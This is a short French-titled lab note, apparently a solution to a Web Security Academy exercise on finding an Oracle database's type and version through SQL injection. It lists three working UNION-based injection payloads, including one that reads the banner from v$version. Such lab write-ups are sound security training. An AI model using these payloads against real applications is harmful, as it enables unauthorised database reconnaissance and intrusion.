Identification du SGBD et de sa version (Oracle)

SQL injection attack, querying the database type and version on Oracle

Lab: SQL injection attack, querying the database type and version on Oracle | Web Security AcademyWebSecAcademy

This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

To solve the lab, display the database version string.

' order by 2-- -
' union select '1','2' from dual-- -
' union select 'hello',banner from v$version-- -

Mis à jour il y a 2 mois

Ce contenu vous a-t-il été utile ?